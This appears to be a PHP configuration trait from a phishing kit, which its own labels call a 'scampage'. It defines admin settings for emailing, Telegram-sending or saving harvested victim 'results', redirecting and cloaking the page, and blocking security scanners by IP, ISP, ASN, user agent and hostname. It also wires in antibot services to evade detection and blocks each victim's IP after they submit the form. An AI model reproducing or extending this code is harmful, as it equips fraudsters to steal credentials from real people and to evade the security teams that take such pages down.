<?php
trait EPConfiguration
{
    public $configuration = null;
    public $props = [];
    public function configurationLoad()
    {
        try {
            $this->configuration = require(dirname(__FILE__) . '/../../.wexler/configuration.php');
            $this->configuration['props'] = $this->configurationLoadProps();
        } catch (Exception $e) {
            $this->errorLog($e->getMessage());
        }
    }
    public function configurationGetProps()
    {
        return (isset($this->configuration['props']) ? $this->configuration['props'] : []);
    }
    public function configurationLoadProps()
    {
        $configurationCurrent = $this->configurationCurrentMyProps();
        $configurationCurrent['_config'] = $this->configurationGetFileProps();
        $configurationCurrent['_config']['features'][] = [
            'type' => 'text',
            'id' => 'sender_from_email',
            'name' => 'Sender From Email',
            'sub' => 'Leave Blank if you don\'t understand',
            'default' => '',
            'group' => 'General',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'text',
            'id' => 'sender_from_name',
            'name' => 'Sender From Name',
            'sub' => 'Leave Blank if you don\'t understand',
            'default' => '',
            'group' => 'General',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'text',
            'id' => 'email',
            'name' => 'Result Email',
            'group' => 'General',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'sendResultAfterFinish',
            'name' => 'Send Full Result Once after Visitor Finish',
            'default' => false,
            'group' => 'General',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'sendChunkedResultUntilFinish',
            'name' => 'Send Chunked Result until Finish',
            'default' => false,
            'group' => 'General',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'saveToLocalResult',
            'name' => 'Save Result to Local Folder (Path: .wexler/result)',
            'group' => 'General',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'saveResultToServer',
            'name' => 'Save Result to Server',
            'default' => true,
            'group' => 'General',
        ];


        $configurationCurrent['_config']['features'][] = [
            'type' => 'alert',
            'id' => 'redirect_notif',
            'name' => '',
            'value' => 'Redirect this scampage to your new link below.',
            'sub' => '',
            'group' => 'Redirect',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'text',
            'id' => 'rediret_link',
            'name' => 'Link',
            'sub' => 'Leave Blank to Turn Off | This link will be redirect to new link',
            'group' => 'Redirect',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'rediret_permanent',
            'name' => 'Permanent Redirect (this mean it will cache and always redirect to new link)',
            'sub' => '',
            'group' => 'Redirect',
        ];

        $configurationCurrent['_config']['features'][] = [
            'type' => 'text',
            'id' => 'parameter',
            'name' => 'Require Parameter',
            'sub' => 'Leave Blank to Turn Off | Visitor are required to access this site with parameter provided.',
            'group' => 'Antibot / Blocker Services',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'text',
            'id' => 'parameter_whitelist',
            'name' => 'Whitelist Parameter',
            'sub' => 'Leave Blank to Turn Off | If you use this parameter you wont get blocked by blocker.',
            'group' => 'Antibot / Blocker Services',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'text',
            'id' => 'mirrorCloak',
            'name' => 'Cloak Website URL',
            'sub' => 'When Get Blocked Mirror Other Website.',
            'group' => 'Antibot / Blocker Services',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'blockWhenFinishSubmit',
            'name' => 'Block Visitor IP After Completing All Form',
            'default' => true,
            'group' => 'Antibot / Blocker Services',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'personalizedBlocker',
            'name' => 'Use Personalized Blocker Service (One Time Access & Other Features)',
            'default' => true,
            'group' => 'Antibot / Blocker Services',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'blockBadIP',
            'name' => 'Block Bad IP',
            'default' => true,
            'group' => 'Antibot / Blocker Services',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'blockBadISP',
            'name' => 'Block Bad ISP',
            'default' => true,
            'group' => 'Antibot / Blocker Services',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'blockBadASN',
            'name' => 'Block Bad ASN',
            'default' => true,
            'group' => 'Antibot / Blocker Services',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'blockBadReferrer',
            'name' => 'Block Bad Referrer',
            'default' => true,
            'group' => 'Antibot / Blocker Services',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'blockBadUA',
            'name' => 'Block Bad Useragent',
            'default' => true,
            'group' => 'Antibot / Blocker Services',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'blockBadHostname',
            'name' => 'Block Bad Hostname',
            'default' => true,
            'group' => 'Antibot / Blocker Services',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'useBlackboxIpBlocked',
            'name' => 'Use Blackbox IP Blocker',
            'default' => true,
            'group' => 'Antibot / Blocker Services',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'useAK',
            'name' => 'Require Access Key',
            'default' => false,
            'group' => 'Antibot / Blocker Services',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'text',
            'id' => 'antibotKey',
            'name' => 'Antibot.pw API Key',
            'sub' => 'Leave blank to turn off | To turn on fill the API Key',
            'group' => 'Antibot / Blocker Services',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'text',
            'id' => 'killbotKey',
            'name' => 'Killbot.org API Key',
            'sub' => 'Leave blank to turn off | To turn on fill the API Key',
            'group' => 'Antibot / Blocker Services',
        ];


        $configurationCurrent['_config']['features'][] = [
            'type' => 'hr',
            'id' => 'platformDivider',
            'name' => '',
            'sub' => '',
            'default' => true,
            'group' => 'Antibot / Blocker Services',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'alert',
            'id' => 'platformAlert',
            'name' => '',
            'value' => 'Manage who can visit your Pages by Platform Type',
            'sub' => '',
            'group' => 'Antibot / Blocker Services',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'platformLinux',
            'name' => 'Allow Linux (Android*) Platform',
            'sub' => '',
            'default' => true,
            'group' => 'Antibot / Blocker Services',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'platformWindows',
            'name' => 'Allow Windows Platform',
            'sub' => '',
            'default' => true,
            'group' => 'Antibot / Blocker Services',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'platformMacOs',
            'name' => 'Allow MacOs Platform',
            'sub' => '',
            'default' => true,
            'group' => 'Antibot / Blocker Services',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'platformOther',
            'name' => 'Allow Other Platform',
            'sub' => '',
            'default' => true,
            'group' => 'Antibot / Blocker Services',
        ];

        $configurationCurrent['_config']['features'][] = [
            'type' => 'hr',
            'id' => 'browserDivider',
            'name' => '',
            'sub' => '',
            'default' => true,
            'group' => 'Antibot / Blocker Services',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'alert',
            'id' => 'browserAlert',
            'name' => '',
            'value' => 'Manage who can visit your Scampage by Browser App',
            'sub' => '',
            'group' => 'Antibot / Blocker Services',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'browserIE',
            'name' => 'Allow Internet Explorer Browser',
            'sub' => '',
            'default' => true,
            'group' => 'Antibot / Blocker Services',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'browserFirefox',
            'name' => 'Allow Mozilla Firefox Browser',
            'sub' => '',
            'default' => true,
            'group' => 'Antibot / Blocker Services',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'browserOpera',
            'name' => 'Allow Opera Browser',
            'sub' => '',
            'default' => true,
            'group' => 'Antibot / Blocker Services',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'browserChrome',
            'name' => 'Allow Google Chrome Browser',
            'sub' => '',
            'default' => true,
            'group' => 'Antibot / Blocker Services',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'browserSafari',
            'name' => 'Allow Safari Browser',
            'sub' => '',
            'default' => true,
            'group' => 'Antibot / Blocker Services',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'browserEdge',
            'name' => 'Allow Edge Browser',
            'sub' => '',
            'default' => true,
            'group' => 'Antibot / Blocker Services',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'browserOther',
            'name' => 'Allow Other Browser',
            'sub' => '',
            'default' => true,
            'group' => 'Antibot / Blocker Services',
        ];


        $configurationCurrent['_config']['features'][] = [
            'type' => 'alert',
            'id' => 'smtpAlert',
            'name' => '',
            'value' => 'If your server can\'t use mail you can use SMTP for alternate sender to send the result.',
            'sub' => '',
            'group' => 'SMTP',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'smtpEnable',
            'name' => 'Enable This Feature',
            'sub' => '',
            'default' => false,
            'group' => 'SMTP',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'text',
            'id' => 'smtpHost',
            'name' => 'SMTP Host',
            'sub' => '',
            'group' => 'SMTP',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'text',
            'id' => 'smtpPort',
            'name' => 'SMTP Port',
            'sub' => '',
            'group' => 'SMTP',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'text',
            'id' => 'smtpUser',
            'name' => 'SMTP Email',
            'sub' => '',
            'group' => 'SMTP',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'text',
            'id' => 'smtpPassword',
            'name' => 'SMTP Password',
            'sub' => '',
            'group' => 'SMTP',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'smtpSecure',
            'name' => 'Use SSL',
            'sub' => '',
            'group' => 'SMTP',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'telegramConsent',
            'name' => 'Enable This Feature',
            'sub' => '',
            'group' => 'Telegram',
        ];
        $configurationCurrent['_config']['features'][] = [
            'type' => 'checkbox',
            'id' => 'sendAnalyticsUsage',
            'name' => 'Send User Analytic',
            'default' => true,
            'sub' => '',
            'group' => 'Scampage Analytic',
        ];



        $configuration = $this->configurationGetDefaultProps();
        foreach ($configurationCurrent as $key => $value) {
            $configuration[$key] = $value;
        }

        $group = [];
        foreach ($configuration['_config']['features'] as $key => $value) {
            if (!isset($value['group'])) $value['group'] = 'General';
            if (!isset($group[$value['group']])) $group[$value['group']] = [];
            $group[$value['group']][] = $value;
        }

        $configuration['_config']['group'] = $group;

        return $configuration;
    }
    public function configurationCurrentMyProps()
    {
        return json_decode(file_get_contents(dirname(__FILE__) . '/../../.wexler/configuration.json'), true);
    }
    public function configurationGetFileProps()
    {
        return json_decode(file_get_contents(dirname(__FILE__) . '/../../default.json'), true);
    }
    public function configurationGetDefaultProps()
    {
        $raw = $this->configurationGetFileProps();
        $props = [
            'sendResultAfterFinish' => false,

            'blockBadHostname' => true,
            'blockBadISP' => true,
            'blockBadReferrer' => true,
            'blockBadUA' => true,
            'blockBadIP' => true,

            'parameter' => '',
            'useBlackboxIpBlocked' => true,
            'blockWhenFinishSubmit' => true,
            'personalizedBlocker' => true,
            'email' => '',
            'antibotKey' => '',
            'killbotKey' => '',
            'smtpEnable' => false,
            'smtpHost' => '',
            'smtpUser' => '',
            'smtpPassword' => '',
            'smtpSecure' => false,
            'telegramConsent' => false,
            'saveToLocalResult' => false,

            'platformLinux' => true,
            'platformWindows' => true,
            'platformMacOs' => true,
            'platformOther' => true,


            'browserIE' => true,
            'browserFirefox' => true,
            'browserOpera' => true,
            'browserChrome' => true,
            'browserSafari' => true,
            'browserEdge' => true,
            'browserOther' => true,


            'sendAnalyticsUsage' => true,

            'sendChunkedResultUntilFinish' => false,
            'sendResultAfterFinish' => false,
        ];
        if (is_array($raw)) {
            foreach ((isset($raw['features']) ? $raw['features'] : []) as $key => $value) {
                if ($value['type'] == "checkbox") {
                    $props[$value['id']] = isset($value['default']) ? $value['default'] : (isset($props[$value['id']]) ? (is_bool($props[$value['id']]) ? $props[$value['id']] : false) : false);
                } else if ($value['type'] == "text") {
                    $props[$value['id']] = isset($value['default']) ? $value['default'] : '';
                } else if ($value['type'] == "select") {
                    $props[$value['id']] = isset($value['default']) ? $value['default'] : '';
                }
            }
        }
        return $props;
    }
    public function configurationUpdate($newData)
    {
        $configurationCurrent = $this->configurationGetDefaultProps();
        $configurationPath = dirname(__FILE__) . '/../../.wexler/configuration.json';
        if (isset($configurationCurrent['_config'])) unset($configurationCurrent['_config']);
        foreach ($newData as $key => $value) {
            $configurationCurrent[$key] = ($value == "on") ? true : $value;
        }
        @unlink($configurationPath);
        @file_put_contents($configurationPath, json_encode($configurationCurrent));
        return true;
    }
}
